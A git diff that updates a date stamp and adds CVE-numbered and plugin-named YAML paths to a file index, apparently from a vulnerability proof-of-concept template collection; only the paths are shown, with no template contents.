diff --git a/date.txt b/date.txt index 96017a2033..3293c43992 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20241017 +20241018 diff --git a/poc.txt b/poc.txt index c43da139f8..61f6ba2402 100644 --- a/poc.txt +++ b/poc.txt @@ -4574,6 +4574,7 @@ ./poc/auth/ptoffice-sign-ups-56ac6fa34cb2062592c555542a68f468.yaml ./poc/auth/ptoffice-sign-ups.yaml ./poc/auth/publishpress-authors-aaae11f293980d2db000f794df5fea87.yaml +./poc/auth/publishpress-authors.yaml ./poc/auth/pulmi-login-check.yaml ./poc/auth/pure-storage-login-9724.yaml ./poc/auth/pure-storage-login-9725.yaml @@ -33511,6 +33512,14 @@ ./poc/cve/CVE-2024-0984-71d91175d296ca328f8e62ec29060567.yaml ./poc/cve/CVE-2024-0984.yaml ./poc/cve/CVE-2024-0986.yaml +./poc/cve/CVE-2024-10014-287fb7ccc9db018318f62de1bc8e246a.yaml +./poc/cve/CVE-2024-10040-ee8183e3617c63ac904e5e710044f265.yaml +./poc/cve/CVE-2024-10049-5634711959b0699a5bdae8c67ef9be92.yaml +./poc/cve/CVE-2024-10055-a7567bb6df1c6f932e81f3fa194c2a29.yaml +./poc/cve/CVE-2024-10057-3619138af4b1755697a61cf7520ca3e3.yaml +./poc/cve/CVE-2024-10078-ac3355172629b828c0c05e8735d48816.yaml +./poc/cve/CVE-2024-10079-79020560113c9d55758318e5701b73cf.yaml +./poc/cve/CVE-2024-10080-e752dddf0fc4544c6494ed49850e78fe.yaml ./poc/cve/CVE-2024-1021.yaml ./poc/cve/CVE-2024-1037-b7f7f3d961a0c33ea429c4b0e05a6902.yaml ./poc/cve/CVE-2024-1037.yaml @@ -40915,6 +40924,7 @@ ./poc/cve/CVE-2024-43355.yaml ./poc/cve/CVE-2024-43356-05ef8f8be0b196ca83c544147054d339.yaml ./poc/cve/CVE-2024-43356.yaml +./poc/cve/CVE-2024-43360.yaml ./poc/cve/CVE-2024-4339-1866bca4b9e3a6717a6f3a0d1ca5a290.yaml ./poc/cve/CVE-2024-4339.yaml ./poc/cve/CVE-2024-4342-467c76b0438cb623f5d9e08694f1ab3a.yaml @@ -41931,26 +41941,47 @@ ./poc/cve/CVE-2024-4789-db4647af61ca31063be76c6f44a638fb.yaml ./poc/cve/CVE-2024-4789.yaml ./poc/cve/CVE-2024-48020-1a3c7c4e6432ae611b5dd11cacf3122e.yaml +./poc/cve/CVE-2024-48020.yaml ./poc/cve/CVE-2024-48021-3202536b475b114ecb69ceee58a3a6b8.yaml +./poc/cve/CVE-2024-48021.yaml ./poc/cve/CVE-2024-48022-6133e4f5ee13976ee5c7e531e6a0b00b.yaml +./poc/cve/CVE-2024-48022.yaml ./poc/cve/CVE-2024-48023-46eb55dd5256b43b1683f15c0267076d.yaml +./poc/cve/CVE-2024-48023.yaml ./poc/cve/CVE-2024-48024-026d31d33246acc9d70dccccb6421f1b.yaml +./poc/cve/CVE-2024-48024.yaml ./poc/cve/CVE-2024-48025-6cd3b5b51f7c36d669654b11d9494954.yaml +./poc/cve/CVE-2024-48025.yaml ./poc/cve/CVE-2024-48026-c610062733a00b0fb29ac3d3a3cb174d.yaml +./poc/cve/CVE-2024-48026.yaml ./poc/cve/CVE-2024-48027-571fc3513bb85aa3d64c4e670f573f21.yaml +./poc/cve/CVE-2024-48027.yaml ./poc/cve/CVE-2024-48028-d097d99e7659a13c8588ca3fa954efea.yaml +./poc/cve/CVE-2024-48028.yaml ./poc/cve/CVE-2024-48029-f32984f494ef89813740687a98347f73.yaml +./poc/cve/CVE-2024-48029.yaml ./poc/cve/CVE-2024-48030-c1a1b779ec73215e6e563fb87876aa6c.yaml +./poc/cve/CVE-2024-48030.yaml ./poc/cve/CVE-2024-48031-fcb96414f71b929b6afe671f5b124ef4.yaml +./poc/cve/CVE-2024-48031.yaml ./poc/cve/CVE-2024-48032-0e6d44d9755568189c98898b670b1718.yaml +./poc/cve/CVE-2024-48032.yaml ./poc/cve/CVE-2024-48033-8e518d6d8c8033e3eca865526322f99e.yaml +./poc/cve/CVE-2024-48033.yaml ./poc/cve/CVE-2024-48034-09a88c5693c52137983ef7e392beaeca.yaml +./poc/cve/CVE-2024-48034.yaml ./poc/cve/CVE-2024-48035-f92910012cdf616c24430d120425dc03.yaml +./poc/cve/CVE-2024-48035.yaml ./poc/cve/CVE-2024-48037-d89d0ad185b0c300ae96673f12cdc2bf.yaml +./poc/cve/CVE-2024-48037.yaml ./poc/cve/CVE-2024-48038-9c7f27476dd4a3919c1c8e4307f286a4.yaml +./poc/cve/CVE-2024-48038.yaml ./poc/cve/CVE-2024-48039-883dbbd880643eda64a8a99bdab006e4.yaml +./poc/cve/CVE-2024-48039.yaml ./poc/cve/CVE-2024-48040-7e3656b3612f7c9ba3d5478ddbb0a10f.yaml +./poc/cve/CVE-2024-48040.yaml ./poc/cve/CVE-2024-48041-fa3562dd06d764593b2df833ed603b8d.yaml +./poc/cve/CVE-2024-48041.yaml ./poc/cve/CVE-2024-4821-e5c1c5c066fc4f0bbdd4673243f80699.yaml ./poc/cve/CVE-2024-4821.yaml ./poc/cve/CVE-2024-4836.yaml @@ -43447,6 +43478,7 @@ ./poc/cve/CVE-2024-7416-efec572b361a709c15a62ccf6c7c8234.yaml ./poc/cve/CVE-2024-7416.yaml ./poc/cve/CVE-2024-7417-39b6b1c12c710f52839dbc980c489688.yaml +./poc/cve/CVE-2024-7417.yaml ./poc/cve/CVE-2024-7418-c9bdaa080236ee0e574742a6ecd2aa08.yaml ./poc/cve/CVE-2024-7418.yaml ./poc/cve/CVE-2024-7420-5be6d8b9afb78ab58d15b1426a2e4662.yaml @@ -43685,6 +43717,7 @@ ./poc/cve/CVE-2024-8031-f6e05cbf1fd3b18d02657892077c5da5.yaml ./poc/cve/CVE-2024-8031.yaml ./poc/cve/CVE-2024-8032-eed885e7e19c9a1253bd6ef65f880faf.yaml +./poc/cve/CVE-2024-8032.yaml ./poc/cve/CVE-2024-8043-613641adfae0294950a0fa915c4316f4.yaml ./poc/cve/CVE-2024-8043.yaml ./poc/cve/CVE-2024-8044-c5c06b8842bfb695b2f240b2af75787b.yaml @@ -43921,6 +43954,7 @@ ./poc/cve/CVE-2024-8547-cb709bfc0402decc4b7f4d6e8fc38cea.yaml ./poc/cve/CVE-2024-8547-f9226340964e19980e69bd0d0fc7b228.yaml ./poc/cve/CVE-2024-8547.yaml +./poc/cve/CVE-2024-8548-4daf0dd20f8629afc9b04bfb46227fd1.yaml ./poc/cve/CVE-2024-8548-796128d9dc0dcb2412f62b506447a915.yaml ./poc/cve/CVE-2024-8548.yaml ./poc/cve/CVE-2024-8549-15f69d1edc28dfdbc1fdf257b5bf9163.yaml @@ -43942,6 +43976,7 @@ ./poc/cve/CVE-2024-8629-aaa25d0c3c5315b31fba6133d516373c.yaml ./poc/cve/CVE-2024-8629.yaml ./poc/cve/CVE-2024-8632-25f2c261c33234a885698b7c793dc7d3.yaml +./poc/cve/CVE-2024-8632-2a1b9f5cb08ce36cad13868373f97134.yaml ./poc/cve/CVE-2024-8632.yaml ./poc/cve/CVE-2024-8633-21749f33a12286225fc84bbb3ba83124.yaml ./poc/cve/CVE-2024-8633.yaml @@ -43975,6 +44010,7 @@ ./poc/cve/CVE-2024-8681-8fc56993d1c07dd1495b80fa682fab16.yaml ./poc/cve/CVE-2024-8681.yaml ./poc/cve/CVE-2024-8700-de190b763c0105020f55ca3eecb3c90d.yaml +./poc/cve/CVE-2024-8700.yaml ./poc/cve/CVE-2024-8702-7e9cb00b97b3efd944b9c924708a1688.yaml ./poc/cve/CVE-2024-8702.yaml ./poc/cve/CVE-2024-8704-580bed351ea1cfb53e2819fa379514d4.yaml @@ -43992,6 +44028,7 @@ ./poc/cve/CVE-2024-8718-bae11f6e4558979b96cf12d8205fcc15.yaml ./poc/cve/CVE-2024-8718.yaml ./poc/cve/CVE-2024-8719-11acce34bf7f1b7b222e1642931e8df6.yaml +./poc/cve/CVE-2024-8719.yaml ./poc/cve/CVE-2024-8720-8bc6aa18362e1b679d780808df5127f3.yaml ./poc/cve/CVE-2024-8720-de75ddb341cf2c3da9270fff1b0efdb8.yaml ./poc/cve/CVE-2024-8720.yaml @@ -44022,6 +44059,7 @@ ./poc/cve/CVE-2024-8737.yaml ./poc/cve/CVE-2024-8738-a508f2d239f8ce325b6596a0349be61b.yaml ./poc/cve/CVE-2024-8738.yaml +./poc/cve/CVE-2024-8740-b2d2025fc8d62dbeaa509a90233bcea6.yaml ./poc/cve/CVE-2024-8741-9090a1c578e6405d68b9ed07468050f6.yaml ./poc/cve/CVE-2024-8741.yaml ./poc/cve/CVE-2024-8742-40e6379c1e4c681d6815f3308854ba0d.yaml @@ -44048,6 +44086,7 @@ ./poc/cve/CVE-2024-8787.yaml ./poc/cve/CVE-2024-8788-0411ba5eec7a5fa7510e28a75f73259c.yaml ./poc/cve/CVE-2024-8788.yaml +./poc/cve/CVE-2024-8790-4fe9861cbe9b7a0d88c8a601eb8883de.yaml ./poc/cve/CVE-2024-8791-dc4e8630da27bf521316c36321cd06e6.yaml ./poc/cve/CVE-2024-8791.yaml ./poc/cve/CVE-2024-8793-51c185f1f91fe91ed28de00dd0c93adc.yaml @@ -44093,6 +44132,7 @@ ./poc/cve/CVE-2024-8914.yaml ./poc/cve/CVE-2024-8915-c96fbadd6669597791ff972bbeeaf8cd.yaml ./poc/cve/CVE-2024-8915.yaml +./poc/cve/CVE-2024-8916-c74251a7188d358a8e93d2706f7401a2.yaml ./poc/cve/CVE-2024-8917-6aaaaa729e35997797a61f2cd09b6335.yaml ./poc/cve/CVE-2024-8917.yaml ./poc/cve/CVE-2024-8918-39a625e1782075559e42a69384a96eb7.yaml @@ -44100,6 +44140,7 @@ ./poc/cve/CVE-2024-8919-fb0057a26cabecd9dfc880674f08a19a.yaml ./poc/cve/CVE-2024-8919.yaml ./poc/cve/CVE-2024-8920-c26e8a37d801dd2fd8f4d049cefa30a5.yaml +./poc/cve/CVE-2024-8920.yaml ./poc/cve/CVE-2024-8921-c8cc9d28480d3f962411e8d319aaea3f.yaml ./poc/cve/CVE-2024-8921.yaml ./poc/cve/CVE-2024-8922-c5ca682c393465990ffa3f49f528998c.yaml @@ -44206,6 +44247,7 @@ ./poc/cve/CVE-2024-9177-178dee7653fa8d80dc1711bad3dcec51.yaml ./poc/cve/CVE-2024-9177.yaml ./poc/cve/CVE-2024-9184-bbbcea152c8a7afc5cdfbc5a529501a6.yaml +./poc/cve/CVE-2024-9184.yaml ./poc/cve/CVE-2024-9187-8b43f9d2f6a2b591d59c81d2238caf51.yaml ./poc/cve/CVE-2024-9187.yaml ./poc/cve/CVE-2024-9189-887572e2c273c4a4bdeea21969a91124.yaml @@ -44214,6 +44256,7 @@ ./poc/cve/CVE-2024-9204.yaml ./poc/cve/CVE-2024-9205-0bcbe389b220d66f2a81aab2e381ea3e.yaml ./poc/cve/CVE-2024-9205.yaml +./poc/cve/CVE-2024-9206-9f1d5cd65695f058d69f00d18f44d9ff.yaml ./poc/cve/CVE-2024-9207-562a1a40f6f33163d985b74bcbe67bf6.yaml ./poc/cve/CVE-2024-9207.yaml ./poc/cve/CVE-2024-9209-4a8efe6f56cb7a747dfc8726b95406f4.yaml @@ -44224,7 +44267,9 @@ ./poc/cve/CVE-2024-9211-bb6a727cd9f729d2c4f5e85e9849f1e6.yaml ./poc/cve/CVE-2024-9211.yaml ./poc/cve/CVE-2024-9213-dae363b473afb57d7fbb1aad2d776b3a.yaml +./poc/cve/CVE-2024-9213.yaml ./poc/cve/CVE-2024-9215-bd487c67d70329011b9510288cdc3f00.yaml +./poc/cve/CVE-2024-9215.yaml ./poc/cve/CVE-2024-9218-75beb28483214f413384b6d563c1c16a.yaml ./poc/cve/CVE-2024-9218.yaml ./poc/cve/CVE-2024-9220-0848a89ff064206197a24c79c138cacc.yaml @@ -44249,11 +44294,13 @@ ./poc/cve/CVE-2024-9237-0780221ee4da552afeda6f1d6485730c.yaml ./poc/cve/CVE-2024-9237.yaml ./poc/cve/CVE-2024-9240-e1b23a53c56acd157c1d8d507856a949.yaml +./poc/cve/CVE-2024-9240.yaml ./poc/cve/CVE-2024-9241-ab99313638ead0b4242684f4ddea4fdd.yaml ./poc/cve/CVE-2024-9241.yaml ./poc/cve/CVE-2024-9242-ce100a23dcb6a754af3f48866fed1686.yaml ./poc/cve/CVE-2024-9242.yaml ./poc/cve/CVE-2024-9263-9f819c527e666a0f4e5ffb74898c3f93.yaml +./poc/cve/CVE-2024-9263.yaml ./poc/cve/CVE-2024-9265-6f041754ba39de1f44500ace37c6936a.yaml ./poc/cve/CVE-2024-9265.yaml ./poc/cve/CVE-2024-9267-8893aa1c1ec1b76901d7871f6ed6bfe5.yaml @@ -44285,22 +44332,32 @@ ./poc/cve/CVE-2024-9346-e439b0199a5e66918fb6aa956d50260c.yaml ./poc/cve/CVE-2024-9346.yaml ./poc/cve/CVE-2024-9347-d7d68470814339ade87e3333f63d9581.yaml +./poc/cve/CVE-2024-9347.yaml ./poc/cve/CVE-2024-9349-7c25de810a6c2b05091210cf0a795a24.yaml ./poc/cve/CVE-2024-9349.yaml +./poc/cve/CVE-2024-9350-46f7941cec982659947867d1e8ef96f4.yaml ./poc/cve/CVE-2024-9351-a4fe42cafc348ca65fcdc7f857114ced.yaml +./poc/cve/CVE-2024-9351.yaml ./poc/cve/CVE-2024-9352-f4efbd8a128de26fc7d35a6fba2877bf.yaml +./poc/cve/CVE-2024-9352.yaml ./poc/cve/CVE-2024-9353-9de693d4e41071f01a7ec1909bb538f7.yaml ./poc/cve/CVE-2024-9353.yaml +./poc/cve/CVE-2024-9361-ae08a2363aeae9e478390a36b3137512.yaml +./poc/cve/CVE-2024-9364-247afd95e97573e50cc26fa4abafe629.yaml +./poc/cve/CVE-2024-9366-99b5e1e8fc06ad16c7d0efd4602b5a83.yaml ./poc/cve/CVE-2024-9368-f73b1d1941e16150d358a5f322adc321.yaml ./poc/cve/CVE-2024-9368.yaml ./poc/cve/CVE-2024-9372-090fa9b8863f4b571cd4ca3dfada9d0b.yaml ./poc/cve/CVE-2024-9372.yaml +./poc/cve/CVE-2024-9373-21279f27679fbe0272aa43186143715d.yaml ./poc/cve/CVE-2024-9375-1ada64725f832858cb5e8e8b357262ef.yaml ./poc/cve/CVE-2024-9375.yaml ./poc/cve/CVE-2024-9377-eb9f54f5139e537cd6a9ac4820541be4.yaml ./poc/cve/CVE-2024-9377.yaml ./poc/cve/CVE-2024-9378-8974a5e92d4cff0ea3c01120fb204b47.yaml ./poc/cve/CVE-2024-9378.yaml +./poc/cve/CVE-2024-9382-4e97289b6d15924ff13ebdb1ff9d487d.yaml +./poc/cve/CVE-2024-9383-a210609d66f2b087a6d8d08b197e2d73.yaml ./poc/cve/CVE-2024-9384-45317d12b3612671d113cd9ed97a884f.yaml ./poc/cve/CVE-2024-9384.yaml ./poc/cve/CVE-2024-9385-1de8f25af6fe092f26514a5fa6e55dd4.yaml @@ -44309,6 +44366,7 @@ ./poc/cve/CVE-2024-9417.yaml ./poc/cve/CVE-2024-9421-e6941b13a2ee565b8bc663927340951b.yaml ./poc/cve/CVE-2024-9421.yaml +./poc/cve/CVE-2024-9425-9969523487d164f3223d1b2ba16294e0.yaml ./poc/cve/CVE-2024-9435-5d078f7f1a49787ecddc7ee4b0d0833f.yaml ./poc/cve/CVE-2024-9435.yaml ./poc/cve/CVE-2024-9436-72a457058cb05b316cebd946dd84ec21.yaml @@ -44321,6 +44379,7 @@ ./poc/cve/CVE-2024-9449.yaml ./poc/cve/CVE-2024-9451-c1f6ee026eb239e994577f2465642250.yaml ./poc/cve/CVE-2024-9451.yaml +./poc/cve/CVE-2024-9452-31c0646fe6fd4340189c7a11a4726afa.yaml ./poc/cve/CVE-2024-9455-a14edcb4af91ec88c5513b8bfa9f2d1c.yaml ./poc/cve/CVE-2024-9455.yaml ./poc/cve/CVE-2024-9457-72dd9bc9875b76de9e691aa9064bfa77.yaml @@ -44356,6 +44415,7 @@ ./poc/cve/CVE-2024-9548-4c3a7fa475046e4dcaed7de30c0d051a.yaml ./poc/cve/CVE-2024-9548.yaml ./poc/cve/CVE-2024-9575-0226044c8d797938fb612d7344053128.yaml +./poc/cve/CVE-2024-9575.yaml ./poc/cve/CVE-2024-9581-3deefaeba320bc3f8ff9dd6ea032aa20.yaml ./poc/cve/CVE-2024-9581.yaml ./poc/cve/CVE-2024-9582-65ec68651aab51111dffe0adecdaff01.yaml @@ -44386,13 +44446,16 @@ ./poc/cve/CVE-2024-9656.yaml ./poc/cve/CVE-2024-9670-590d40c02bbb47b092deffa0e1d25829.yaml ./poc/cve/CVE-2024-9670.yaml +./poc/cve/CVE-2024-9674-531fd254227c00a4d5bf989a15584f9f.yaml ./poc/cve/CVE-2024-9685-162e285486f85718f1eff0c9fc075030.yaml ./poc/cve/CVE-2024-9685.yaml ./poc/cve/CVE-2024-9687-b374db15d58a163b3240b89c41715498.yaml ./poc/cve/CVE-2024-9687.yaml ./poc/cve/CVE-2024-9689-47104403d02f947163494ee0975df512.yaml +./poc/cve/CVE-2024-9689.yaml ./poc/cve/CVE-2024-9696-7eb3ceca660ff8ed51fe8b0a6a2f165c.yaml ./poc/cve/CVE-2024-9696.yaml +./poc/cve/CVE-2024-9703-e13e3ba30616df9b1b2959b3e69d88ea.yaml ./poc/cve/CVE-2024-9704-f21a430d525f14c5222622c2499dbc1f.yaml ./poc/cve/CVE-2024-9704.yaml ./poc/cve/CVE-2024-9707-4fb16dfc3a442890f762f60d876d8c4d.yaml @@ -44413,28 +44476,36 @@ ./poc/cve/CVE-2024-9824.yaml ./poc/cve/CVE-2024-9837-640ab38f88c83ed061eb38b767c65747.yaml ./poc/cve/CVE-2024-9837.yaml +./poc/cve/CVE-2024-9848-ac1bebcc37e467cdd99a1009c53e8491.yaml ./poc/cve/CVE-2024-9860-b04ee97e5d460a289f93568831e0cf5e.yaml ./poc/cve/CVE-2024-9860.yaml ./poc/cve/CVE-2024-9861-cfe0d10a7099e61a765c45a5117c1825.yaml +./poc/cve/CVE-2024-9861.yaml ./poc/cve/CVE-2024-9862-4c515258d7126da4aa95e80d95f6a5c1.yaml +./poc/cve/CVE-2024-9862.yaml ./poc/cve/CVE-2024-9863-c87082cf07c135fafcb187e887a8da89.yaml +./poc/cve/CVE-2024-9863.yaml ./poc/cve/CVE-2024-9873-c5ed80b51344fca9873ea5af2135924b.yaml ./poc/cve/CVE-2024-9873.yaml ./poc/cve/CVE-2024-9888-8bc8fdc1eaaf79b8ee4d0d77b372a40f.yaml ./poc/cve/CVE-2024-9888.yaml ./poc/cve/CVE-2024-9891-2ab1858bc0a4346f292143b3e3d4717f.yaml ./poc/cve/CVE-2024-9891.yaml +./poc/cve/CVE-2024-9892-b4887767d0388ff3fe05ed90d581f15b.yaml ./poc/cve/CVE-2024-9893-f0049aface0e9d994b8b256bddfdec1b.yaml ./poc/cve/CVE-2024-9893.yaml ./poc/cve/CVE-2024-9895-6f8924e42d51af274da92f196c6372b1.yaml ./poc/cve/CVE-2024-9895.yaml ./poc/cve/CVE-2024-9898-7b8053b6be9c8712ff2d49ed6c3dc10e.yaml +./poc/cve/CVE-2024-9898.yaml ./poc/cve/CVE-2024-9937-9915217ba7d6f29cd232016898fb9998.yaml ./poc/cve/CVE-2024-9937.yaml ./poc/cve/CVE-2024-9940-7282ba1c7231feca51bd0ab70c139261.yaml +./poc/cve/CVE-2024-9940.yaml ./poc/cve/CVE-2024-9944-c4d693e491a7b94e2552e7400b79d0d6.yaml ./poc/cve/CVE-2024-9944.yaml ./poc/cve/CVE-2024-9951-be046d8362f1832edd91856d0526cdb7.yaml +./poc/cve/CVE-2024-9951.yaml ./poc/cve/CVE202127562-220331-222408.yaml ./poc/cve/CVE_2023_49442.yaml ./poc/cve/CVE_2023_51467.yaml @@ -52269,6 +52340,7 @@ ./poc/debug/sitecore-debug-page-10285.yaml ./poc/debug/sitecore-debug-page.yaml ./poc/debug/soap-ajax-debugshell.yaml +./poc/debug/strut-debug-mode.yaml ./poc/debug/struts-debug-mode-10559.yaml ./poc/debug/struts-debug-mode-10560.yaml ./poc/debug/struts-debug-mode-10561.yaml @@ -62043,6 +62115,7 @@ ./poc/microsoft/miniorange-firebase-sms-otp-verification-22c963942345caf88900612979c9cae6.yaml ./poc/microsoft/miniorange-firebase-sms-otp-verification-4468e2106e183a688613280714142718.yaml ./poc/microsoft/miniorange-firebase-sms-otp-verification-887b055ad889aa10b3dc934d36ffbf4f.yaml +./poc/microsoft/miniorange-firebase-sms-otp-verification.yaml ./poc/microsoft/mm-forms-community-9b22852627967262a0033b664f77f26c.yaml ./poc/microsoft/mm-forms-community.yaml ./poc/microsoft/modern-designs-for-gravity-forms-6477bf18cad6c823db485408d49b337b.yaml @@ -76731,6 +76804,7 @@ ./poc/other/add-to-feedly.yaml ./poc/other/add-user-role-21e7e28b1bd21b72344ed338d4838ea7.yaml ./poc/other/add-user-role.yaml +./poc/other/add-widget-after-content-d85568da3687a3e685b0444c220ceb6e.yaml ./poc/other/add-widgets-to-page-6dd76854df716f92f3713948d74c7196.yaml ./poc/other/add-widgets-to-page.yaml ./poc/other/add2fav-d0b66ad8340cbda7cc5753e39ef1c7d5.yaml @@ -77113,6 +77187,7 @@ ./poc/other/advanced-booking-calendar-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/advanced-booking-calendar-plugin.yaml ./poc/other/advanced-booking-calendar.yaml +./poc/other/advanced-category-and-custom-taxonomy-image-73c3c8752c78aa879dec30ab6cd50af4.yaml ./poc/other/advanced-category-template-4dfad7f8c1b3e76abdd4b87e074ede23.yaml ./poc/other/advanced-category-template-f71c7106c714a62195172820fb00c915.yaml ./poc/other/advanced-category-template.yaml @@ -78245,6 +78320,7 @@ ./poc/other/arcom-malware.yaml ./poc/other/arconix-faq-56239764c43cd4666defc5c1ee7c1873.yaml ./poc/other/arconix-faq.yaml +./poc/other/arconix-shortcodes-6211e427613ea6a179193b7355acf836.yaml ./poc/other/arconix-shortcodes-7a41a1e084cd2f3ac351e8264449d771.yaml ./poc/other/arconix-shortcodes-f5f9ec1a66da2f65afef7cacfc25a1c0.yaml ./poc/other/arconix-shortcodes.yaml @@ -80137,6 +80213,7 @@ ./poc/other/brandfolder-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/brandfolder-plugin.yaml ./poc/other/brandfolder.yaml +./poc/other/branding-bb37f6417503b5ce748656e458facde1.yaml ./poc/other/bravada-8ea16af389c1d6b6902cbc3c30c42d83.yaml ./poc/other/bravada.yaml ./poc/other/brave-phish.yaml @@ -80561,6 +80638,7 @@ ./poc/other/bulk-editor.yaml ./poc/other/bulk-image-alt-text-with-yoast-8bcf0403da71d586e0e15d6051979d24.yaml ./poc/other/bulk-image-alt-text-with-yoast.yaml +./poc/other/bulk-image-resizer-b562d45258ab161721689720617accce.yaml ./poc/other/bulk-image-title-attribute-5bd5aa842bdc4d50b077cba9da1f3c12.yaml ./poc/other/bulk-image-title-attribute-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/bulk-image-title-attribute-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -83340,6 +83418,7 @@ ./poc/other/create-block-theme.yaml ./poc/other/create-bucket.yaml ./poc/other/create-f93a4314da2b6ca44fe64167be75ce25.yaml +./poc/other/create-flipbook-from-pdf.yaml ./poc/other/create.yaml ./poc/other/creative-addons-for-elementor-092b5cbcb926412f552245832dc8d8dc.yaml ./poc/other/creative-addons-for-elementor.yaml @@ -83995,6 +84074,7 @@ ./poc/other/dearpdf-lite-a37d44de66fefc417ca516737edd4052.yaml ./poc/other/dearpdf-lite.yaml ./poc/other/debian.yaml +./poc/other/debrandify-af092808d29c61cc63a89aeb529b32ca.yaml ./poc/other/decalog-69862cce8cff7d2d39740f235792aec9.yaml ./poc/other/decalog.yaml ./poc/other/deep-blue-0d6c75eb4cb21682235e690ad8d026b9.yaml @@ -84324,6 +84404,7 @@ ./poc/other/disabler-5f5024299ff002b1b0dad1c3a4de6783.yaml ./poc/other/disabler.yaml ./poc/other/disc-golf-manager-87fd0c6ebf33ae0c4541e30377b20498.yaml +./poc/other/disc-golf-manager.yaml ./poc/other/discogs.yaml ./poc/other/discord-client-id.yaml ./poc/other/discord-phish.yaml @@ -85271,7 +85352,10 @@ ./poc/other/easy-pixels-by-jevnet-79c8a4ffa9a8ac887fdf0fbdc6e80f74.yaml ./poc/other/easy-pixels-by-jevnet.yaml ./poc/other/easy-popup-show.yaml +./poc/other/easy-post-types-41dccfb17f0433d3add9d08a47570aa1.yaml +./poc/other/easy-post-types-422d4e69ffd0199ede6b487dc4d39805.yaml ./poc/other/easy-post-types-47b03f08b2c86cb04ae26a4f2f4da9aa.yaml +./poc/other/easy-post-types-681e1b321c3a1aa369c7bb180213815e.yaml ./poc/other/easy-post-types.yaml ./poc/other/easy-post-views-count-ae6476461be319aaccada90332153205.yaml ./poc/other/easy-post-views-count.yaml @@ -85702,6 +85786,7 @@ ./poc/other/elegant-pink.yaml ./poc/other/elegant-themes-icons-f4de45cac420185bd4a02c27c2e97e1c.yaml ./poc/other/elegant-themes-icons.yaml +./poc/other/elemenda-36540ed00b00575eb872e13e9900b7cd.yaml ./poc/other/element-ready-lite-66ec7ab88b502756d65fc9821abaaf74.yaml ./poc/other/element-ready-lite-94b21f21217e93f10723771be259bf05.yaml ./poc/other/element-ready-lite-996340b247c4d15433fd33467ee38312.yaml @@ -86530,6 +86615,7 @@ ./poc/other/event-calendar-wd-plugin.yaml ./poc/other/event-calendar-wd.yaml ./poc/other/event-calendars-cfabc15b3c29e69217f6ffeac4d81a3b.yaml +./poc/other/event-calendars.yaml ./poc/other/event-easy-calendar-4e8aa55b46555bc979d5a286528ea82a.yaml ./poc/other/event-easy-calendar-80ab23e77cc71af4ffd65eca0ab437e8.yaml ./poc/other/event-easy-calendar-8227d9b1b74cf347a95813b6804b631a.yaml @@ -86986,6 +87072,7 @@ ./poc/other/extensive-vc-addon-0e78620225161ad18a3ee1ed967cbc08.yaml ./poc/other/extensive-vc-addon.yaml ./poc/other/external-featured-image-from-bing-6b05b75b5f7a0c86bc701d486f671a02.yaml +./poc/other/external-featured-image-from-bing.yaml ./poc/other/external-media-8cbd4a5897c6821bd03260c510651652.yaml ./poc/other/external-media-c610dd76c06151d00457b0ccb2802b71.yaml ./poc/other/external-media-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -87299,6 +87386,7 @@ ./poc/other/featured-post-creative-c70dd3ca915f5566afae3da744b9cb85.yaml ./poc/other/featured-post-creative.yaml ./poc/other/featured-posts-with-multiple-custom-groups-fpmcg-31859a41abcd3ada53000a62b9e48892.yaml +./poc/other/featured-posts-with-multiple-custom-groups-fpmcg.yaml ./poc/other/federatedpress-mastodon-instance.yaml ./poc/other/feed-changer-e67c211b6c31af1566744d218f7c0a06.yaml ./poc/other/feed-changer.yaml @@ -87643,6 +87731,7 @@ ./poc/other/flat-preloader-a0e0e1a16d947aaa7c62bda95132c6a3.yaml ./poc/other/flat-preloader-c387bc071d1ef8a8a150ac0525598884.yaml ./poc/other/flat-preloader.yaml +./poc/other/flat-ui-button-89c780e5fcb1649d68625aca09850426.yaml ./poc/other/flatpress.yaml ./poc/other/flatsome-3f6b244918ae6d23248f545d5a2c7877.yaml ./poc/other/flatsome-73c67231ecd48aea95e4eeb093bf93ad.yaml @@ -87683,6 +87772,7 @@ ./poc/other/flexible-shipping-usps-e9e36a60529338c1efcb1cc580097e2b.yaml ./poc/other/flexible-shipping-usps.yaml ./poc/other/flexible-shipping.yaml +./poc/other/flexmls-idx.yaml ./poc/other/flexnet_publisher.yaml ./poc/other/flickr-gallery-5d19b62ef05aec0b9e2aea4a3c907c11.yaml ./poc/other/flickr-gallery-8c07be2c7a1693818604febc00838a68.yaml @@ -87914,6 +88004,7 @@ ./poc/other/fontmeister-4faffe8d18050f583a8fc219e25c00dc.yaml ./poc/other/fontmeister.yaml ./poc/other/fonto-42d19dec467a5cd49bcb56ac65cb8b38.yaml +./poc/other/fonto.yaml ./poc/other/fontsampler-0505170bafd96f142dd43f019268bac7.yaml ./poc/other/fontsampler-c8f1a34ab04e902713044551a76173de.yaml ./poc/other/fontsampler-d23d0b4ce6c99393a215217b40032cf1.yaml @@ -88719,6 +88810,7 @@ ./poc/other/ganglia-xml-grid-monitor.yaml ./poc/other/ganglia.yaml ./poc/other/gantry-26331f1e23aa3cae2c716a0d19223272.yaml +./poc/other/gantry-8355d258c5013eab39c370d8a445bea5.yaml ./poc/other/gantry-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/gantry-e7d1b99e868be00cfbca65c0c50e796a.yaml ./poc/other/gantry-f076075f1ff6a37e358bf06783a72186.yaml @@ -88916,6 +89008,7 @@ ./poc/other/get-your-number.yaml ./poc/other/get.yaml ./poc/other/getmonero.yaml +./poc/other/getresponse-5843fd2130c195d444e82707bb1d32a3.yaml ./poc/other/getresponse-integration-e5d7fa71e6908442857a0cb0670fa481.yaml ./poc/other/getresponse-integration-fa4bcc5aa8ddc19efefa3934ed36cbc7.yaml ./poc/other/getresponse-integration.yaml @@ -90865,6 +90958,7 @@ ./poc/other/indianic-testimonial.yaml ./poc/other/indusguard-waf.yaml ./poc/other/infinite-41a0e2197b1e34008d46269e662a4b92.yaml +./poc/other/infinite-scroll-ecc3ceebb8b22551e98ee5bec4ce51d4.yaml ./poc/other/infinite.yaml ./poc/other/infocus-01b2c43a0128da282dcced6fec397407.yaml ./poc/other/infocus-146240802372d8034245f2f20343755c.yaml @@ -91237,6 +91331,7 @@ ./poc/other/ip-guard.yaml ./poc/other/ip-ipwhois.yaml 